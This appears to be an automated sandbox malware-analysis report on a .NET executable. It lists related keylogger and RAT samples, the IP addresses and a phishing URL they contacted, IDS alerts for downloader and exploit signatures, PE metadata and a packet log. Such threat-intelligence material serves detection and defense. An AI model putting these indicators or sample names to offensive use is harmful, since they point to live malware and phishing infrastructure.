	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	200716 SUMI SAUJANA Water Pump 100%.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Eprdtdrqbr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Quotation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	PROFORMA FATURA pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	clipper.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
TELEGRAMRU	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	oZ7nac01Em.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	PZKAQY0bX5.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	aLRjksjY78.exe	Get hash	malicious	HackBrowser	Browse	149.154.167.220
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
CLOUDFLARENETUS	https://my-homepagero.sa.com/exml/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	https://pdfhost.io/v/maTYQa.jg_mqfilserawxgxdgxhhgsx_1	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
CLOUDFLARENETUS	https://my-homepagero.sa.com/exml/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	https://pdfhost.io/v/maTYQa.jg_mqfilserawxgxdgxhhgsx_1	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	z17Mz7zumpwTUMRxyS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	INVOICE ATTACHMENT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	MB267382625AE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	greatthingswithmegoods.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	149.154.167.220
	seethebestthingswithgreatthingshrewithme.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	149.154.167.220
	creatednewthingsformee.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	149.154.167.220
	greenthingswithgreatnewsforgetmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	149.154.167.220
	TJXpRilNkh.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	IM3OLcx7li.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	1bE8S5sN9S.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\2Lzx7LMDWV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379736180876081
Encrypted:	false
SSDEEP:	48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZSUyus:tLHyIFKL3IZ2KRH9OugEs
MD5:	72F35C292A6859CB7CFB21D40EC3D2F8
SHA1:	96F18AB9B3CF301A61D0ABE374AB33B8EB864884
SHA-256:	9CC6A174C97D345DA67AA1F586EAF5911BE61B92B75E0FB283BE338B45BA4325
SHA-512:	B6DA5E7BE2F9D1AB05403801395524C1EFCB843747BF2C302BF8A5690A9197ED01B909852368F4A71D77EA2400085F629FF666869042A4D0A432836DF1DFD5B0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3aih0hza.nam.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsa3qsnl.1qu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_to43g1ae.30c.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xd32leeb.h0h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.074309178534168
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	2Lzx7LMDWV.exe
File size:	1'039'360 bytes
MD5:	f70379292f5c009d309aa771803b8a47
SHA1:	146e5ac87cb3c65624b027fa925861be2bde0003
SHA256:	dc9e448e51f4504726d8fdccfce805dfb4c228091f12a194fef40b2a86aa5eb2
SHA512:	3eb75605563f10f5a48ed01dd07d4ad31a8e35a511504d5fa50ca64e1d4d7b96a7a538cadd13983e537a6ea1201f0b2a50da0122d3573a2ce4b665e7749a8f80
SSDEEP:	24576:1vfVYijKZquDiAot5zwlGaZkAAeWnhl4Ruyh:1vfV/jKskibXqGlnX4ck
TLSH:	91257CE036A2E736DC5D2630705CCD7D92612E2830D475D26AE93FAB3EBE2914938F15
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B$g..............0.............:.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	b5b58182aaa8aa82

Static PE Info

General

Entrypoint:	0x4fde3a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67244215 [Fri Nov 1 02:51:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FBE691DC682h
je 00007FBE691DC682h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007FBE691DC682h
imul eax, dword ptr [eax], 00610076h
je 00007FBE691DC682h
outsd
add byte ptr [edx+00h], dh
dec ebp
add byte ptr [ebp+00h], ah
insd
add byte ptr [edi+00h], ch
jc 00007FBE691DC682h
imul eax, dword ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfdde8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfe000	0x1618	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x100000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xfbe70	0xfc000	15619b37f0e1a78857e4ba2f7f6c3936	False	0.7319171239459326	data	7.077834220569421	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xfe000	0x1618	0x1800	cae9ebe5bdd29da09ae1d1019432bfe8	False	0.7291666666666666	data	6.794822435965714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x100000	0xc	0x200	f479f4d3f22a9b94e6907cf0c0781340	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xfe0c8	0x1218	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8698186528497409
RT_GROUP_ICON	0xff2f0	0x14	data	1.05
RT_VERSION	0xff314	0x300	MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"	0.4544270833333333

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T04:49:04.113487+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.6.168	80	TCP
2024-11-01T04:49:05.582248+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.6.168	80	TCP
2024-11-01T04:49:06.308956+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49736	188.114.96.3	443	TCP
2024-11-01T04:49:07.222862+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	193.122.6.168	80	TCP
2024-11-01T04:49:09.630312+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49741	188.114.96.3	443	TCP
2024-11-01T04:49:11.272632+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49743	188.114.96.3	443	TCP
2024-11-01T04:49:16.147276+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49749	188.114.97.3	443	TCP
2024-11-01T04:49:17.783694+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49752	188.114.97.3	443	TCP
2024-11-01T04:49:18.286659+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49750	TCP
2024-11-01T04:49:39.016010+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	50301	TCP
2024-11-01T04:49:40.311678+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	50302	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 04:49:02.961158037 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:02.966100931 CET	80	49733	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:02.966192961 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:02.966454029 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:02.971261978 CET	80	49733	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:03.801280975 CET	80	49733	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:03.823712111 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:03.828619957 CET	80	49733	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:04.067662954 CET	80	49733	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:04.113487005 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:04.130842924 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:04.130873919 CET	443	49734	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:04.130942106 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:04.140499115 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:04.140516043 CET	443	49734	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:04.801359892 CET	443	49734	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:04.801429987 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:04.807331085 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:04.807338953 CET	443	49734	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:04.807766914 CET	443	49734	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:04.847856998 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:04.900304079 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:04.947340012 CET	443	49734	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:05.278722048 CET	443	49734	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:05.278942108 CET	443	49734	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:05.279135942 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:05.285092115 CET	49734	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:05.289273977 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:05.295633078 CET	80	49733	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:05.539391994 CET	80	49733	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:05.542330027 CET	49736	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:05.542371035 CET	443	49736	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:05.542439938 CET	49736	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:05.542756081 CET	49736	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:05.542783022 CET	443	49736	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:05.582247972 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:06.161719084 CET	443	49736	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:06.164187908 CET	49736	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:06.164222956 CET	443	49736	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:06.309062004 CET	443	49736	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:06.309278965 CET	443	49736	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:06.309348106 CET	49736	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:06.309806108 CET	49736	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:06.313499928 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:06.314735889 CET	49738	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:06.318573952 CET	80	49733	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:06.318625927 CET	49733	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:06.319503069 CET	80	49738	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:06.319608927 CET	49738	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:06.319705963 CET	49738	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:06.324454069 CET	80	49738	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:07.167191029 CET	80	49738	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:07.168291092 CET	49739	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:07.168348074 CET	443	49739	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:07.168493986 CET	49739	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:07.168766022 CET	49739	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:07.168780088 CET	443	49739	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:07.222862005 CET	49738	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:07.778496981 CET	443	49739	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:07.780220985 CET	49739	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:07.780251980 CET	443	49739	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:07.956967115 CET	443	49739	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:07.957205057 CET	443	49739	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:07.957293987 CET	49739	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:07.958031893 CET	49739	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:07.962033033 CET	49740	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:07.966878891 CET	80	49740	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:07.969635010 CET	49740	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:07.969710112 CET	49740	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:07.974487066 CET	80	49740	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:08.804523945 CET	80	49740	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:08.805602074 CET	49741	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:08.805653095 CET	443	49741	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:08.805715084 CET	49741	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:08.806032896 CET	49741	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:08.806047916 CET	443	49741	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:08.847868919 CET	49740	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:09.424772024 CET	443	49741	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:09.472912073 CET	49741	443	192.168.2.4	188.114.96.3
